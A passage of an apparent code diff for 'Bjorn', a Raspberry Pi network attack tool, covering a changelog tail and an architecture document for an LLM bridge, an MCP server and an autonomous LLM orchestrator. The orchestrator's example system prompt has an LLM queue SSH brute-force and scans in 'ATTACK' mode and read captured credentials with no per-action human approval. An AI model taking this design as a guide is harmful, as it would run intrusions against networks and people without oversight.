- **[ORCH-BUG]** Fixed Auto->Manual mode switch not resetting status to IDLE (4-location fix across `orchestrator.py`, `Bjorn.py`, and `orchestrator_utils.py`)
|
||||
- Fixed D3 network graph memory leaks on page navigation
|
||||
- Fixed multiple zombie timer and event listener leaks across all SPA pages
|
||||
- Fixed search debounce timers not being cleaned up on unmount
|
||||
|
||||
### Quality & Stability
|
||||
|
||||
- **Standardized error handling** across all `web_utils` modules with consistent JSON response format
|
||||
- **Magic numbers extracted** to named constants throughout the codebase
|
||||
- **All 18 SPA pages** reviewed and hardened:
|
||||
- 11 pages fully rewritten with ResourceTracker, safe DOM (no innerHTML), visibility-aware pollers
|
||||
- 7 pages with targeted fixes for memory leaks, zombie timers, state reset issues
|
||||
- **Uniform action metadata format** — All actions use AST-friendly `b_*` module-level constants for class, module, status, port, service, trigger, priority, cooldown, rate_limit, etc.
|
||||
|
||||
---
|
||||
|
||||
### Infrastructure & DevOps
|
||||
|
||||
- **Mode Switcher** (`mode-switcher.sh`) — Shell script for switching between operation modes
|
||||
- **Bluetooth setup** (`bjorn_bluetooth.sh`) — Automated Bluetooth service configuration
|
||||
- **USB Gadget setup** (`bjorn_usb_gadget.sh`) — USB HID gadget mode configuration for Loki
|
||||
- **WiFi setup** (`bjorn_wifi.sh`) — WiFi interface and monitor mode management
|
||||
- **MAC prefix database** (`data/input/prefixes/nmap-mac-prefixes.txt`) — Vendor identification for discovered devices
|
||||
- **Common wordlists** (`data/input/wordlists/common.txt`) — Built-in wordlist for web enumeration
|
||||
|
||||
### Dependencies
|
||||
|
||||
**Added:**
|
||||
- `zeroconf>=0.131.0` — LaRuche/LAND mDNS auto-discovery
|
||||
- `paramiko` — SSH operations for C2 agent communication (moved from optional to core)
|
||||
- `cryptography` (via Fernet) — C2 communication encryption
|
||||
|
||||
**Removed:**
|
||||
- `Pillow==9.4.0` — No longer pinned (use system version)
|
||||
- `rich==13.9.4` — Removed (was used for standalone logging)
|
||||
- `pandas==2.2.3` — Removed (lightweight alternatives used instead)
|
||||
|
||||
**Optional (documented):**
|
||||
- `mcp[cli]>=1.0.0` — MCP server support
|
||||
|
||||
---
|
||||
|
||||
### Breaking Changes
|
||||
|
||||
- **Web UI URLs changed** — Individual page URLs (`/bjorn.html`, `/config.html`, etc.) replaced by SPA hash routes (`/#/bjorn`, `/#/settings`, etc.)
|
||||
- **Database schema expanded** — New tables for actions queue, circuit breaker, sentinel alerts, bifrost data, loki jobs, C2 agents, web enumeration, studio pipelines. Migration is automatic.
|
||||
- **Configuration keys expanded** — `shared_config.json` now contains 45+ additional keys. Unknown keys are safely ignored; new defaults are applied automatically.
|
||||
- **Action module format updated** — Actions now use `b_*` metadata constants instead of class-level attributes. Old-format actions will need migration.
|
||||
- **RDP actions removed** — `rdp_connector.py` and `steal_files_rdp.py` dropped in favor of more capable modules.
|
||||
|
||||
---
|
||||
|
||||
### Stats
|
||||
|
||||
```
|
||||
Component | v1 | v2 | Change
|
||||
─────────────────────┼───────────┼─────────────┼──────────
|
||||
Python files | 37 | 130+ | +250%
|
||||
Python LoC | ~8,200 | ~58,000 | +607%
|
||||
JS/CSS/HTML LoC | ~2,100 | ~42,000 | +1,900%
|
||||
Action modules | 17 | 32 | +88%
|
||||
Web pages | 6 | 25 | +317%
|
||||
DB modules | 1 | 18 | +1,700%
|
||||
Web API modules | 0 | 18+ | New
|
||||
Config parameters | ~80 | ~180+ | +125%
|
||||
Supported languages | 1 | 7 | +600%
|
||||
Shell scripts | 3 | 5 | +67%
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
*Skol! The Cyberviking has evolved.*
|
||||
916
LLM_MCP_ARCHITECTURE.md
Normal file
916
LLM_MCP_ARCHITECTURE.md
Normal file
@@ -0,0 +1,916 @@
|
||||
# BJORN — LLM Bridge, MCP Server & LLM Orchestrator
|
||||
## Complete architecture, operation, commands, fallbacks
|
||||
|
||||
---
|
||||
|
||||
## Table of contents
|
||||
|
||||
1. [Overview](#1-overview)
|
||||
2. [Created / modified files](#2-created--modified-files)
|
||||
3. [LLM Bridge (`llm_bridge.py`)](#3-llm-bridge-llm_bridgepy)
|
||||
4. [MCP Server (`mcp_server.py`)](#4-mcp-server-mcp_serverpy)
|
||||
5. [LLM Orchestrator (`llm_orchestrator.py`)](#5-llm-orchestrator-llm_orchestratorpy)
|
||||
6. [Orchestrator & Scheduler integration](#6-orchestrator--scheduler-integration)
|
||||
7. [Web Utils LLM (`web_utils/llm_utils.py`)](#7-web-utils-llm-web_utilsllm_utilspy)
|
||||
8. [EPD comment integration (`comment.py`)](#8-epd-comment-integration-commentpy)
|
||||
9. [Configuration (`shared.py`)](#9-configuration-sharedpy)
|
||||
10. [HTTP Routes (`webapp.py`)](#10-http-routes-webapppy)
|
||||
11. [Web interfaces](#11-web-interfaces)
|
||||
12. [Startup (`Bjorn.py`)](#12-startup-bjornpy)
|
||||
13. [LaRuche / LAND Protocol compatibility](#13-laruche--land-protocol-compatibility)
|
||||
14. [Optional dependencies](#14-optional-dependencies)
|
||||
15. [Quick activation & configuration](#15-quick-activation--configuration)
|
||||
16. [Complete API endpoint reference](#16-complete-api-endpoint-reference)
|
||||
17. [Queue priority system](#17-queue-priority-system)
|
||||
18. [Fallbacks & graceful degradation](#18-fallbacks--graceful-degradation)
|
||||
19. [Call sequences](#19-call-sequences)
|
||||
|
||||
---
|
||||
|
||||
## 1. Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ BJORN (RPi) │
|
||||
│ │
|
||||
│ ┌─────────────┐ ┌──────────────────┐ ┌─────────────────────┐ │
|
||||
│ │ Core BJORN │ │ MCP Server │ │ Web UI │ │
|
||||
│ │ (unchanged) │ │ (mcp_server.py) │ │ /chat.html │ │
|
||||
│ │ │ │ 7 exposed tools │ │ /mcp-config.html │ │
|
||||
│ │ comment.py │ │ HTTP SSE / stdio │ │ ↳ Orch Log button │ │
|
||||
│ │ ↕ LLM hook │ │ │ │ │ │
|
||||
│ └──────┬──────┘ └────────┬─────────┘ └──────────┬──────────┘ │
|
||||
│ └─────────────────────────────────────────────┘ │
|
||||
│ │ │
|
||||
│ ┌──────────────────────────▼─────────────────────────────────┐ │
|
||||
│ │ LLM Bridge (llm_bridge.py) │ │
|
||||
│ │ Singleton · Thread-safe │ │
|
||||
│ │ │ │
|
||||
│ │ Automatic cascade: │ │
|
||||
│ │ 1. LaRuche node (LAND/mDNS → HTTP POST /infer) │ │
|
||||
│ │ 2. Local Ollama (HTTP POST /api/chat) │ │
|
||||
│ │ 3. External API (Anthropic / OpenAI / OpenRouter) │ │
|
||||
│ │ 4. None (→ fallback templates in comment.py) │ │
|
||||
│ │ │ │
|
||||
│ │ Agentic tool-calling loop (stop_reason=tool_use, ≤6 turns) │ │
|
||||
│ │ _BJORN_TOOLS: 7 tools in Anthropic format │ │
|
||||
│ └─────────────────────────────────────────────────────────────┘ │
|
||||
│ │ │
|
||||
│ ┌──────────────────────────▼─────────────────────────────────┐ │
|
||||
│ │ LLM Orchestrator (llm_orchestrator.py) │ │
|
||||
│ │ │ │
|
||||
│ │ mode = none → LLM has no role in scheduling │ │
|
||||
│ │ mode = advisor → LLM suggests 1 action/cycle (prio 85) │ │
|
||||
│ │ mode = autonomous→ own thread, loop + tools (prio 82) │ │
|
||||
│ │ │ │
|
||||
│ │ Fingerprint (hosts↑, vulns↑, creds↑, queue_id↑) │ │
|
||||
│ │ → skip LLM if nothing new (token savings) │ │
|
||||
│ └─────────────────────────────────────────────────────────────┘ │
|
||||
│ │ │
|
||||
│ ┌──────────────────────────▼─────────────────────────────────┐ │
|
||||
│ │ Action Queue (SQLite) │ │
|
||||
│ │ scheduler=40 normal=50 MCP=80 autonomous=82 advisor=85│ │
|
||||
│ └─────────────────────────────────────────────────────────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────────┘
|
||||
↕ mDNS _ai-inference._tcp.local. (zeroconf)
|
||||
┌──────────────────────────────────────────┐
|
||||
│ LaRuche Swarm (LAN) │
|
||||
│ Node A → Mistral 7B :8419 │
|
||||
│ Node B → DeepSeek Coder :8419 │
|
||||
│ Node C → Phi-3 Mini :8419 │
|
||||
└──────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
**Design principles:**
|
||||
- Everything is **disabled by default** — zero impact if not configured
|
||||
- All dependencies are **optional** — silent import if missing
|
||||
- **Systematic fallback** at every level — Bjorn never crashes because of the LLM
|
||||
- The bridge is a **singleton** — one instance per process, thread-safe
|
||||
- EPD comments preserve their **exact original behaviour** if LLM is disabled
|
||||
- The LLM is the **brain** (decides what to do), the orchestrator is the **arms** (executes)
|
||||
|
||||
---
|
||||
|
||||
## 2. Created / modified files
|
||||
|
||||
### Created files
|
||||
|
||||
| File | Approx. size | Role |
|
||||
|------|-------------|------|
|
||||
| `llm_bridge.py` | ~450 lines | LLM Singleton — backend cascade + agentic tool-calling loop |
|
||||
| `mcp_server.py` | ~280 lines | FastMCP MCP Server — 7 Bjorn tools |
|
||||
| `web_utils/llm_utils.py` | ~220 lines | LLM/MCP HTTP endpoints (web_utils pattern) |
|
||||
| `llm_orchestrator.py` | ~410 lines | LLM Orchestrator — advisor & autonomous modes |
|
||||
| `web/chat.html` | ~300 lines | Chat interface + Orch Log button |
|
||||
| `web/mcp-config.html` | ~400 lines | LLM & MCP configuration page |
|
||||
|
||||
### Modified files
|
||||
|
||||
| File | What changed |
|
||||
|------|-------------|
|
||||
| `shared.py` | +45 config keys (LLM bridge, MCP, orchestrator) |
|
||||
| `comment.py` | LLM hook in `get_comment()` — 12 lines added |
|
||||
| `utils.py` | +1 entry in lazy WebUtils registry: `"llm_utils"` |
|
||||
| `webapp.py` | +9 GET/POST routes in `_register_routes_once()` |
|
||||
| `Bjorn.py` | LLM Bridge warm-up + conditional MCP server start |
|
||||
| `orchestrator.py` | +`LLMOrchestrator` lifecycle + advisor call in background tasks |
|
||||
| `action_scheduler.py` | +skip scheduler if LLM autonomous only (`llm_orchestrator_skip_scheduler`) |
|
||||
| `requirements.txt` | +3 comment lines (optional dependencies documented) |
|
||||
|
||||
---
|
||||
|
||||
## 3. LLM Bridge (`llm_bridge.py`)
|
||||
|
||||
### Internal architecture
|
||||
|
||||
```
|
||||
LLMBridge (Singleton)
|
||||
├── __init__() Initialises singleton, launches LaRuche discovery
|
||||
├── complete() Main API — cascades all backends
|
||||
│ └── tools=None/[...] Optional param to enable tool-calling
|
||||
├── generate_comment() Generates a short EPD comment (≤80 tokens)
|
||||
├── chat() Stateful chat with per-session history
|
||||
│ └── tools=_BJORN_TOOLS if llm_chat_tools_enabled=True
|
||||
├── clear_history() Clears a session's history
|
||||
├── status() Returns bridge state (for the UI)
|
||||
│
|
||||
├── _start_laruche_discovery() Starts mDNS thread in background
|
||||
├── _discover_laruche_mdns() Listens to _ai-inference._tcp.local. continuously
|
||||
│
|
||||
├── _call_laruche() Backend 1 — POST http://[node]:8419/infer
|
||||
├── _call_ollama() Backend 2 — POST http://localhost:11434/api/chat
|
||||
├── _call_anthropic() Backend 3a — POST api.anthropic.com + AGENTIC LOOP
|
||||
│ └── loop ≤6 turns: send → tool_use → execute → feed result → repeat
|
||||
├── _call_openai_compat() Backend 3b — POST [base_url]/v1/chat/completions
|
||||
│
|
||||
├── _execute_tool(name, inputs) Dispatches to mcp_server._impl_*
|
||||
│ └── gate: checks mcp_allowed_tools before executing
|
||||
│
|
||||
└── _build_system_prompt() Builds system prompt with live Bjorn context
|
||||
|
||||
_BJORN_TOOLS : List[Dict] Anthropic-format definitions for the 7 MCP tools
|
||||
```
|
||||
|
||||
### _BJORN_TOOLS — full list
|
||||
|
||||
```python
|
||||
_BJORN_TOOLS = [
|
||||
{"name": "get_hosts", "description": "...", "input_schema": {...}},
|
||||
{"name": "get_vulnerabilities", ...},
|
||||
{"name": "get_credentials", ...},
|
||||
{"name": "get_action_history", ...},
|
||||
{"name": "get_status", ...},
|
||||
{"name": "run_action", ...}, # gated by mcp_allowed_tools
|
||||
{"name": "query_db", ...}, # SELECT only
|
||||
]
|
||||
```
|
||||
|
||||
### Backend cascade
|
||||
|
||||
```
|
||||
llm_backend = "auto" → LaRuche → Ollama → API → None
|
||||
llm_backend = "laruche" → LaRuche only
|
||||
llm_backend = "ollama" → Ollama only
|
||||
llm_backend = "api" → External API only
|
||||
```
|
||||
|
||||
At each step, if a backend fails (timeout, network error, missing model), the next one is tried **silently**. If all fail, `complete()` returns `None`.
|
||||
|
||||
### Agentic tool-calling loop (`_call_anthropic`)
|
||||
|
||||
When `tools` is passed to `complete()`, the Anthropic backend enters agentic mode:
|
||||
|
||||
```
|
||||
_call_anthropic(messages, system, tools, max_tokens, timeout)
|
||||
│
|
||||
├─ POST /v1/messages {tools: [...]}
|
||||
│
|
||||
├─ [stop_reason = "tool_use"]
|
||||
│ for each tool_use block:
|
||||
│ result = _execute_tool(name, inputs)
|
||||
│ append {role: "tool", tool_use_id: ..., content: result}
|
||||
│ POST /v1/messages [messages + tool results] ← next turn
|
||||
│
|
||||
└─ [stop_reason = "end_turn"] → returns final text
|
||||
[≥6 turns] → returns partial text + warning
|
||||
```
|
||||
|
||||
`_execute_tool()` dispatches directly to `mcp_server._impl_*` (no network), checking `mcp_allowed_tools` for `run_action`.
|
||||
|
||||
### Tool-calling in chat (`chat()`)
|
||||
|
||||
If `llm_chat_tools_enabled = True`, the chat passes `tools=_BJORN_TOOLS` to the backend, letting the LLM answer with real-time data (hosts, vulns, creds…) rather than relying only on its training knowledge.
|
||||
|
||||
### Chat history
|
||||
|
||||
- Each session has its own history (key = `session_id`)
|
||||
- Special session `"llm_orchestrator"`: contains the autonomous orchestrator's reasoning
|
||||
- Max size configurable: `llm_chat_history_size` (default: 20 messages)
|
||||
- History is **in-memory only** — not persisted across restarts
|
||||
- Thread-safe via `_hist_lock`
|
||||
|
||||
---
|
||||
|
||||
## 4. MCP Server (`mcp_server.py`)
|
||||
|
||||
### What is MCP?
|
||||
|
||||
The **Model Context Protocol** (Anthropic) is an open-source protocol that lets AI agents (Claude Desktop, custom agents, etc.) use external tools via a standardised interface.
|
||||
|
||||
By enabling Bjorn's MCP server, **any MCP client can query and control Bjorn** — without knowing the internal DB structure.
|
||||
|
||||
### Exposed tools
|
||||
|
||||
| Tool | Arguments | Description |
|
||||
|------|-----------|-------------|
|
||||
| `get_hosts` | `alive_only: bool = True` | Returns discovered hosts (IP, MAC, hostname, OS, ports) |
|
||||
| `get_vulnerabilities` | `host_ip: str = ""`, `limit: int = 100` | Returns discovered CVE vulnerabilities |
|
||||
| `get_credentials` | `service: str = ""`, `limit: int = 100` | Returns captured credentials (SSH, FTP, SMB…) |
|
||||
| `get_action_history` | `limit: int = 50`, `action_name: str = ""` | History of executed actions |
|
||||
| `get_status` | *(none)* | Real-time state: mode, active action, counters |
|
||||
| `run_action` | `action_name: str`, `target_ip: str`, `target_mac: str = ""` | Queues a Bjorn action (MCP priority = 80) |
|
||||
| `query_db` | `sql: str`, `params: str = "[]"` | Free SELECT against the SQLite DB (read-only) |
|
||||
|
||||
**Security:** each tool checks `mcp_allowed_tools` — unlisted tools return a clean error. `query_db` rejects anything that is not a `SELECT`.
|
||||
|
||||
### `_impl_run_action` — priority detail
|
||||
|
||||
```python
|
||||
_MCP_PRIORITY = 80 # > scheduler(40) > normal(50)
|
||||
|
||||
sd.db.queue_action(
|
||||
action_name=action_name,
|
||||
mac=mac, # resolved from hosts WHERE ip=? if not supplied
|
||||
ip=target_ip,
|
||||
priority=_MCP_PRIORITY,
|
||||
trigger="mcp",
|
||||
metadata={"decision_method": "mcp", "decision_origin": "mcp"},
|
||||
)
|
||||
sd.queue_event.set() # wakes the orchestrator immediately
|
||||
```
|
||||
|
||||
### Available transports
|
||||
|
||||
| Transport | Config | Usage |
|
||||
|-----------|--------|-------|
|
||||
| `http` (default) | `mcp_transport: "http"`, `mcp_port: 8765` | Accessible from any MCP client on LAN via SSE |
|
||||
| `stdio` | `mcp_transport: "stdio"` | Claude Desktop, CLI agents |
|
||||
|
||||
---
|
||||
|
||||
## 5. LLM Orchestrator (`llm_orchestrator.py`)
|
||||
|
||||
The LLM Orchestrator transforms Bjorn from a scriptable tool into an autonomous agent. It is **completely optional and disableable** via `llm_orchestrator_mode = "none"`.
|
||||
|
||||
### Operating modes
|
||||
|
||||
| Mode | Config value | Operation |
|
||||
|------|-------------|-----------|
|
||||
| Disabled | `"none"` (default) | LLM plays no role in planning |
|
||||
| Advisor | `"advisor"` | LLM consulted periodically, suggests 1 action |
|
||||
| Autonomous | `"autonomous"` | Own thread, LLM observes + plans with tools |
|
||||
|
||||
### Internal architecture
|
||||
|
||||
```
|
||||
LLMOrchestrator
|
||||
├── start() Starts autonomous thread if mode=autonomous
|
||||
├── stop() Stops thread (join 15s max)
|
||||
├── restart_if_mode_changed() Called from orchestrator.run() each iteration
|
||||
├── is_active() True if autonomous thread is alive
|
||||
│
|
||||
├── [ADVISOR MODE]
|
||||
│ advise() → called from orchestrator._process_background_tasks()
|
||||
│ ├── _build_snapshot() → compact dict (hosts, vulns, creds, queue)
|
||||
│ ├── LLMBridge().complete(prompt, system)
|
||||
│ └── _apply_advisor_response(raw, allowed)
|
||||
│ ├── parse JSON {"action": str, "target_ip": str, "reason": str}
|
||||
│ ├── validate action ∈ allowed
|
||||
│ └── db.queue_action(priority=85, trigger="llm_advisor")
|
||||
│
|
||||
└── [AUTONOMOUS MODE]
|
||||
_autonomous_loop() Thread "LLMOrchestrator" (daemon)
|
||||
└── loop:
|
||||
_compute_fingerprint() → (hosts, vulns, creds, max_queue_id)
|
||||
_has_actionable_change() → skip if nothing increased
|
||||
_run_autonomous_cycle()
|
||||
├── filter tools: read-only always + run_action if in allowed
|
||||
├── LLMBridge().complete(prompt, system, tools=[...])
|
||||
│ └── _call_anthropic() agentic loop
|
||||
│ → LLM calls run_action via tools
|
||||
│ → _execute_tool → _impl_run_action → queue
|
||||
└── if llm_orchestrator_log_reasoning=True:
|
||||
logger.info("[LLM_ORCH_REASONING]...")
|
||||
_push_to_chat() → "llm_orchestrator" session in LLMBridge
|
||||
sleep(llm_orchestrator_interval_s)
|
||||
```
|
||||
|
||||
### Fingerprint and smart skip
|
||||
|
||||
```python
|
||||
def _compute_fingerprint(self) -> tuple:
|
||||
# (host_count, vuln_count, cred_count, max_completed_queue_id)
|
||||
return (hosts, vulns, creds, last_id)
|
||||
|
||||
def _has_actionable_change(self, fp: tuple) -> bool:
|
||||
if self._last_fingerprint is None:
|
||||
return True # first cycle always runs
|
||||
# Triggers ONLY if something INCREASED
|
||||
# hosts going offline → not actionable
|
||||
return any(fp[i] > self._last_fingerprint[i] for i in range(len(fp)))
|
||||
```
|
||||
|
||||
**Token savings:** if `llm_orchestrator_skip_if_no_change = True` (default), the LLM cycle is skipped if no new hosts/vulns/creds and no action completed since the last cycle.
|
||||
|
||||
### LLM priorities vs queue
|
||||
|
||||
```python
|
||||
_ADVISOR_PRIORITY = 85 # advisor > MCP(80) > normal(50) > scheduler(40)
|
||||
_AUTONOMOUS_PRIORITY = 82 # autonomous slightly below advisor
|
||||
```
|
||||
|
||||
### Autonomous system prompt — example
|
||||
|
||||
```
|
||||
"You are Bjorn's autonomous orchestrator, running on a Raspberry Pi network security tool.
|
||||
Current state: 12 hosts discovered, 3 vulnerabilities, 1 credentials.
|
||||
Operation mode: ATTACK. Hard limit: at most 3 run_action calls per cycle.
|
||||
Only these action names may be queued: NmapScan, SSHBruteforce, SMBScan.
|
||||
Strategy: prioritise unexplored services, hosts with high port counts, and hosts with no recent scans.
|
||||
Do not queue duplicate actions already pending or recently successful.
|
||||
Use Norse references occasionally. Be terse and tactical."
|
||||
```
|
||||
|
||||
### Advisor response format
|
||||
|
||||
```json
|
||||
// Action recommended:
|
||||
{"action": "NmapScan", "target_ip": "192.168.1.42", "reason": "unexplored host, 0 open ports known"}
|
||||
|
||||
// Nothing to do:
|
||||
{"action": null}
|
||||
```
|
||||
|
||||
### Reasoning log
|
||||
|
||||
When `llm_orchestrator_log_reasoning = True`:
|
||||
- Full reasoning is logged via `logger.info("[LLM_ORCH_REASONING]...")`
|
||||
- It is also injected into the `"llm_orchestrator"` session in `LLMBridge._chat_histories`
|
||||
- Viewable in real time in `chat.html` via the **Orch Log** button
|
||||
|
||||
---
|
||||
|
||||
## 6. Orchestrator & Scheduler integration
|
||||
|
||||
### `orchestrator.py`
|
||||
|
||||
```python
|
||||
# __init__
|
||||
self.llm_orchestrator = None
|
||||
self._init_llm_orchestrator()
|
||||
|
||||
# _init_llm_orchestrator()
|
||||
if shared_data.config.get("llm_enabled") and shared_data.config.get("llm_orchestrator_mode") != "none":
|
||||
from llm_orchestrator import LLMOrchestrator
|
||||
self.llm_orchestrator = LLMOrchestrator(shared_data)
|
||||
self.llm_orchestrator.start()
|
||||
|
||||
# run() — each iteration
|
||||
self._sync_llm_orchestrator() # starts/stops thread according to runtime config
|
||||
|
||||
# _process_background_tasks()
|
||||
if self.llm_orchestrator and mode == "advisor":
|
||||
self.llm_orchestrator.advise()
|
||||
```
|
||||
|
||||
### `action_scheduler.py` — skip option
|
||||
|
||||
```python
|
||||
# In run(), each iteration:
|
||||
_llm_skip = bool(
|
||||
shared_data.config.get("llm_orchestrator_skip_scheduler", False)
|
||||
and shared_data.config.get("llm_orchestrator_mode") == "autonomous"
|
||||
and shared_data.config.get("llm_enabled", False)
|
||||
)
|
||||
|
||||
if not _llm_skip:
|
||||
self._publish_all_upcoming() # step 2: publish due actions
|
||||
self._evaluate_global_actions() # step 3: global evaluation
|
||||
self.evaluate_all_triggers() # step 4: per-host triggers
|
||||
# Steps 1 (promote due) and 5 (cleanup/priorities) always run
|
||||
```
|
||||
|
||||
When `llm_orchestrator_skip_scheduler = True` + `mode = autonomous` + `llm_enabled = True`:
|
||||
- The scheduler no longer publishes automatic actions (no more `B_require`, `B_trigger`, etc.)
|
||||
- The autonomous LLM becomes **sole master of the queue**
|
||||
- Queue hygiene (promotions, cleanup) remains active
|
||||
|
||||
---
|
||||
|
||||
## 7. Web Utils LLM (`web_utils/llm_utils.py`)
|
||||
|
||||
Follows the exact **same pattern** as all other `web_utils` (constructor `__init__(self, shared_data)`, methods called by `webapp.py`).
|
||||
|
||||
### Methods
|
||||
|
||||
| Method | Type | Description |
|
||||
|--------|------|-------------|
|
||||
| `get_llm_status(handler)` | GET | LLM bridge state (active backend, LaRuche URL…) |
|
||||
| `get_llm_config(handler)` | GET | Current LLM config (api_key masked) |
|
||||
| `get_llm_reasoning(handler)` | GET | `llm_orchestrator` session history (reasoning log) |
|
||||
| `handle_chat(data)` | POST | Sends a message, returns LLM response |
|
||||
| `clear_chat_history(data)` | POST | Clears a session's history |
|
||||
| `get_mcp_status(handler)` | GET | MCP server state (running, port, transport) |
|
||||
| `toggle_mcp(data)` | POST | Enables/disables MCP server + saves config |
|
||||
| `save_mcp_config(data)` | POST | Saves MCP config (tools, port, transport) |
|
||||
| `save_llm_config(data)` | POST | Saves LLM config (all parameters) |
|
||||
|
||||
---
|
||||
|
||||
## 8. EPD comment integration (`comment.py`)
|
||||
|
||||
### Behaviour before modification
|
||||
|
||||
```
|
||||
get_comment(status, lang, params)
|
||||
└── if delay elapsed OR status changed
|
||||
└── _pick_text(status, lang, params) ← SQLite DB
|
||||
└── returns weighted text
|
||||
```
|
||||
|
||||
### Behaviour after modification
|
||||
|
||||
```
|
||||
get_comment(status, lang, params)
|
||||
└── if delay elapsed OR status changed
|
||||
│
|
||||
├── [if llm_comments_enabled = True]
|
||||
│ └── LLMBridge().generate_comment(status, params)
|
||||
│ ├── success → LLM text (≤12 words, ~8s max)
|
||||
│ └── failure/timeout → text = None
|
||||
│
|
||||
└── [if text = None] ← SYSTEMATIC FALLBACK
|
||||
└── _pick_text(status, lang, params) ← original behaviour
|
||||
└── returns weighted DB text
|
||||
```
|
||||
|
||||
**Original behaviour preserved 100% if LLM disabled or failing.**
|
||||
|
||||
---
|
||||
|
||||
## 9. Configuration (`shared.py`)
|
||||
|
||||
### LLM Bridge section (`__title_llm__`)
|
||||
|
||||
| Key | Default | Type | Description |
|
||||
|-----|---------|------|-------------|
|
||||
| `llm_enabled` | `False` | bool | **Master toggle** — activates the entire bridge |
|
||||
| `llm_comments_enabled` | `False` | bool | Use LLM for EPD comments |
|
||||
| `llm_chat_enabled` | `True` | bool | Enable /chat.html interface |
|
||||
| `llm_chat_tools_enabled` | `False` | bool | Enable tool-calling in web chat |
|
||||
| `llm_backend` | `"auto"` | str | `auto` \| `laruche` \| `ollama` \| `api` |
|
||||
| `llm_laruche_discovery` | `True` | bool | Auto-discover LaRuche nodes via mDNS |
|
||||
| `llm_laruche_url` | `""` | str | Manual LaRuche URL (overrides discovery) |
|
||||
| `llm_ollama_url` | `"http://127.0.0.1:11434"` | str | Local Ollama URL |
|
||||
| `llm_ollama_model` | `"phi3:mini"` | str | Ollama model to use |
|
||||
| `llm_api_provider` | `"anthropic"` | str | `anthropic` \| `openai` \| `openrouter` |
|
||||
| `llm_api_key` | `""` | str | API key (masked in UI) |
|
||||
| `llm_api_model` | `"claude-haiku-4-5-20251001"` | str | External API model |
|
||||
| `llm_api_base_url` | `""` | str | Custom base URL (OpenRouter, proxy…) |
|
||||
| `llm_timeout_s` | `30` | int | Global LLM call timeout (seconds) |
|
||||
| `llm_max_tokens` | `500` | int | Max tokens for chat |
|
||||
| `llm_comment_max_tokens` | `80` | int | Max tokens for EPD comments |
|
||||
| `llm_chat_history_size` | `20` | int | Max messages per chat session |
|
||||
|
||||
### MCP Server section (`__title_mcp__`)
|
||||
|
||||
| Key | Default | Type | Description |
|
||||
|-----|---------|------|-------------|
|
||||
| `mcp_enabled` | `False` | bool | Enable MCP server |
|
||||
| `mcp_transport` | `"http"` | str | `http` (SSE) \| `stdio` |
|
||||
| `mcp_port` | `8765` | int | HTTP SSE port |
|
||||
| `mcp_allowed_tools` | `[all]` | list | List of authorised MCP tools |
|
||||
|
||||
### LLM Orchestrator section (`__title_llm_orch__`)
|
||||
|
||||
| Key | Default | Type | Description |
|
||||
|-----|---------|------|-------------|
|
||||
| `llm_orchestrator_mode` | `"none"` | str | `none` \| `advisor` \| `autonomous` |
|
||||
| `llm_orchestrator_interval_s` | `60` | int | Delay between autonomous cycles (min 30s) |
|
||||
| `llm_orchestrator_max_actions` | `3` | int | Max actions per autonomous cycle |
|
||||
| `llm_orchestrator_allowed_actions` | `[]` | list | Actions the LLM may queue (empty = mcp_allowed_tools) |
|
||||
| `llm_orchestrator_skip_scheduler` | `False` | bool | Disable scheduler when autonomous is active |
|
||||
| `llm_orchestrator_skip_if_no_change` | `True` | bool | Skip cycle if fingerprint unchanged |
|
||||
| `llm_orchestrator_log_reasoning` | `False` | bool | Log full LLM reasoning |
|
||||
|
||||
---
|
||||
|
||||
## 10. HTTP Routes (`webapp.py`)
|
||||
|
||||
### GET routes
|
||||
|
||||
| Route | Handler | Description |
|
||||
|-------|---------|-------------|
|
||||
| `GET /api/llm/status` | `llm_utils.get_llm_status` | LLM bridge state |
|
||||
| `GET /api/llm/config` | `llm_utils.get_llm_config` | LLM config (api_key masked) |
|
||||
| `GET /api/llm/reasoning` | `llm_utils.get_llm_reasoning` | Orchestrator reasoning log |
|
||||
| `GET /api/mcp/status` | `llm_utils.get_mcp_status` | MCP server state |
|
||||
|
||||
### POST routes (JSON data-only)
|
||||
|
||||
| Route | Handler | Description |
|
||||
|-------|---------|-------------|
|
||||
| `POST /api/llm/chat` | `llm_utils.handle_chat` | Send a message to the LLM |
|
||||
| `POST /api/llm/clear_history` | `llm_utils.clear_chat_history` | Clear a session's history |
|
||||
| `POST /api/llm/config` | `llm_utils.save_llm_config` | Save LLM config |
|
||||
| `POST /api/mcp/toggle` | `llm_utils.toggle_mcp` | Enable/disable MCP |
|
||||
| `POST /api/mcp/config` | `llm_utils.save_mcp_config` | Save MCP config |
|
||||
|
||||
All routes respect Bjorn's existing authentication (`webauth`).
|
||||
|
||||
---
|
||||
|
||||
## 11. Web interfaces
|
||||
|
||||
### `/chat.html`
|
||||
|
||||
Terminal-style chat interface (black/red, consistent with Bjorn).
|
||||
|
||||
**Features:**
|
||||
- Auto-detects LLM state on load (`GET /api/llm/status`)
|
||||
- Displays active backend (LaRuche URL, or mode)
|
||||
- "Bjorn is thinking..." indicator during response
|
||||
- Unique session ID per browser tab
|
||||
- `Enter` = send, `Shift+Enter` = new line
|
||||
- Textarea auto-resize
|
||||
- **"Clear history"** button — clears server-side session
|
||||
- **"Orch Log"** button — loads the autonomous orchestrator's reasoning
|
||||
- Calls `GET /api/llm/reasoning`
|
||||
- Renders each message (cycle prompt + LLM response) as chat bubbles
|
||||
- "← Back to chat" to return to normal chat
|
||||
- Helper message if log is empty (hint: enable `llm_orchestrator_log_reasoning`)
|
||||
|
||||
**Access:** `http://[bjorn-ip]:8000/chat.html`
|
||||
|
||||
### `/mcp-config.html`
|
||||
|
||||
Full LLM & MCP configuration page.
|
||||
|
||||
**LLM Bridge section:**
|
||||
- Master enable/disable toggle
|
||||
- EPD comments, chat, chat tool-calling toggles
|
||||
- Backend selector (auto / laruche / ollama / api)
|
||||
- LaRuche mDNS discovery toggle + manual URL
|
||||
- Ollama configuration (URL + model)
|
||||
- External API configuration (provider, key, model, custom URL)
|
||||
- Timeout and token parameters
|
||||
- "TEST CONNECTION" button
|
||||
|
||||
**MCP Server section:**
|
||||
- Enable toggle with live start/stop
|
||||
- Transport selector (HTTP SSE / stdio)
|
||||
- HTTP port
|
||||
- Per-tool checkboxes
|
||||
- "RUNNING" / "OFF" indicator
|
||||
|
||||
**Access:** `http://[bjorn-ip]:8000/mcp-config.html`
|
||||
|
||||
---
|
||||
|
||||
